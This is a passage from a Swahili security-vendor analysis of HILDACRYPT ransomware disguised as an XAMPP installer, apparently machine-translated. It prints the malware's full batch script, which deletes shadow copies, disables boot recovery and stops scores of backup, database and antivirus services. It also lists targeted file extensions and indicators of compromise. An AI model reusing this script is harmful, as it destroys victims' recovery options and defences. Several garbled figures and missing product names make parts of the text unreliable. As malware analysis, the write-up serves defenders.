Habari, Habr! Kwa mara nyingine tena, tunazungumza kuhusu matoleo mapya zaidi ya programu hasidi kutoka kategoria ya Ransomware. HILDACRYPT ni programu mpya ya ukombozi, mwanachama wa familia ya Hilda iliyogunduliwa mnamo Agosti 2019, iliyopewa jina la katuni ya Netflix ambayo ilitumika kusambaza programu. Leo tunafahamiana na sifa za kiufundi za virusi hivi vilivyosasishwa vya ransomware.
Katika toleo la kwanza la Hilda ransomware, kiungo kwa moja iliyowekwa kwenye Youtube mfululizo wa katuni ulikuwa katika barua ya fidia. HILDACRYPT inajifanya kuwa kisakinishi halali cha XAMPP, usambazaji wa Apache ambao ni rahisi kusakinisha unaojumuisha MariaDB, PHP na Perl. Wakati huo huo, cryptolocker ina jina tofauti la faili - xamp. Kwa kuongeza, faili ya ransomware haina saini ya elektroniki.
Uchambuzi tuli
Ransomware iko katika faili ya PE32 .NET iliyoandikwa kwa ajili ya MS Windows. Ukubwa wake ni ka 135. Msimbo mkuu wa programu na msimbo wa programu ya mtetezi zimeandikwa katika C#. Kulingana na tarehe na muhuri wa wakati wa kukusanywa, mfumo wa jozi iliundwa tarehe 168 Septemba 14.
Kulingana na Detect It Easy, ransomware imewekwa kwenye kumbukumbu kwa kutumia Confuser na ConfuserEx, lakini obfuscators hizi ni sawa na hapo awali, ConfuserEx pekee ndiye mrithi wa Confuser, kwa hivyo saini zao za nambari zinafanana.
HILDACRYPT imepakiwa na ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vekta ya kushambulia
Uwezekano mkubwa zaidi, programu ya ukombozi iligunduliwa kwenye mojawapo ya tovuti za programu za wavuti, ikijifanya kuwa programu halali ya XAMPP.
Mlolongo mzima wa maambukizi unaweza kuonekana ndani .
Obfuscation
Kamba za ransomware huhifadhiwa kwa njia iliyosimbwa kwa njia fiche. Inapozinduliwa, HILDACRYPT huziondoa kwa kutumia Base64 na AES-256-CBC.
Ufungaji
Kwanza kabisa, ransomware huunda folda katika %AppDataRoaming% ambamo kigezo cha GUID (Kitambulisho cha Kipekee cha Ulimwenguni) kinatolewa bila mpangilio. Kwa kuongeza faili ya bat kwenye eneo hili, virusi vya ukombozi huizindua kwa kutumia cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & toka
Kisha huanza kutekeleza hati ya kundi ili kuzima huduma au huduma za mfumo.
Hati ina orodha ndefu ya amri zinazoharibu nakala za vivuli, kuzima seva ya SQL, chelezo na suluhisho za antivirus.
Kwa mfano, inajaribu bila mafanikio kusimamisha huduma za Backup Acronis. Kwa kuongeza, inashambulia mifumo ya chelezo na ufumbuzi wa antivirus kutoka kwa wauzaji wafuatayo: Veeam, Sophos, Kaspersky, McAfee na wengine.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Pindi huduma na michakato iliyotajwa hapo juu imezimwa, kificha hukusanya taarifa kuhusu michakato yote inayoendeshwa kwa kutumia amri ya orodha ya kazi ili kuhakikisha kuwa huduma zote muhimu ziko chini.
orodha ya kazi v/fo csv
Amri hii inaonyesha orodha ya kina ya michakato inayoendesha, vipengele ambavyo vinatenganishwa na ishara ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Baada ya ukaguzi huu, ransomware huanza mchakato wa usimbuaji.
Usimbuaji fiche
Usimbaji fiche wa faili
HILDACRYPT hupitia maudhui yote yaliyopatikana ya diski kuu, isipokuwa kwa folda za Recycle.Bin na Reference AssembliesMicrosoft. Mwisho una faili muhimu za dll, pdb, n.k. za programu za .Net ambazo zinaweza kuathiri utendakazi wa ransomware. Ili kutafuta faili ambazo zitasimbwa kwa njia fiche, orodha ifuatayo ya viendelezi hutumiwa:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomware hutumia algoriti ya AES-256-CBC kusimba faili za watumiaji kwa njia fiche. Saizi muhimu ni biti 256 na saizi ya vekta ya uanzishaji (IV) ni baiti 16.
Katika picha ya skrini ifuatayo, thamani za byte_2 na byte_1 zilipatikana bila mpangilio kwa kutumia GetBytes().
Muhimu
KATIKA NA
Faili iliyosimbwa ina kiendelezi HCY!.. Huu ni mfano wa faili iliyosimbwa. Ufunguo na IV zilizotajwa hapo juu ziliundwa kwa faili hii.
Usimbaji fiche muhimu
Kijifichacho huhifadhi ufunguo wa AES uliozalishwa katika faili iliyosimbwa. Sehemu ya kwanza ya faili iliyosimbwa ina kichwa ambacho kina data kama vile HILDACRYPT, KEY, IV, FileLen katika umbizo la XML, na inaonekana kama hii:
Usimbaji fiche wa ufunguo wa AES na IV unafanywa kwa kutumia RSA-2048, na usimbaji unafanywa kwa kutumia Base64. Ufunguo wa umma wa RSA huhifadhiwa kwenye mwili wa kificha sauti katika mojawapo ya mifuatano iliyosimbwa kwa njia fiche katika umbizo la XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Ufunguo wa umma wa RSA hutumiwa kusimba ufunguo wa faili wa AES. Ufunguo wa umma wa RSA umesimbwa Base64 na una moduli na kipengee cha umma cha 65537. Usimbaji fiche unahitaji ufunguo wa faragha wa RSA, ambao mvamizi anao.
Baada ya usimbaji fiche wa RSA, ufunguo wa AES husimbwa kwa kutumia Base64 iliyohifadhiwa kwenye faili iliyosimbwa.
Ujumbe wa fidia
Usimbaji fiche ukishakamilika, HILDACRYPT huandika faili ya html kwenye folda ambamo ilisimba faili. Arifa ya programu ya ukombozi ina anwani mbili za barua pepe ambapo mwathirika anaweza kuwasiliana na mshambulizi.
Notisi ya unyang'anyi pia ina mstari "Hakuna loli ni salama;)" - rejeleo la wahusika wa anime na manga wenye kuonekana kwa wasichana wadogo waliopigwa marufuku nchini Japani.
Pato
HILDACRYPT, familia mpya ya kikombozi, imetoa toleo jipya. Muundo wa usimbaji fiche humzuia mwathiriwa kusimbua faili zilizosimbwa kwa njia fiche na programu ya uokoaji. Cryptolocker hutumia mbinu zinazotumika za ulinzi kuzima huduma za ulinzi zinazohusiana na mifumo ya kuhifadhi nakala na suluhu za antivirus. Mwandishi wa HILDACRYPT ni shabiki wa mfululizo wa uhuishaji wa Hilda unaoonyeshwa kwenye Netflix, kiungo cha trela ambacho kilikuwa katika barua ya ununuzi ya toleo la awali la programu.
Kama kawaida, и inaweza kulinda kompyuta yako dhidi ya programu ya ukombozi ya HILDACRYPT, na watoa huduma wana uwezo wa kulinda wateja wao kwa kutumia . Ulinzi unahakikishwa na ukweli kwamba suluhisho hizi zinajumuisha inajumuisha sio tu nakala rudufu, lakini pia mfumo wetu wa usalama uliojumuishwa - Inaendeshwa na modeli ya kujifunza kwa mashine na kulingana na utabiri wa tabia, teknolojia ambayo inaweza kukabiliana na tishio la programu ya kukomboa ya siku sifuri kama hakuna nyingine.
Viashiria vya maelewano
Ugani wa faili HCY!
HILDACRYPTReadMe.html
xamp.exe na herufi moja "p" na hakuna saini ya dijiti
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Chanzo: mapenzi.com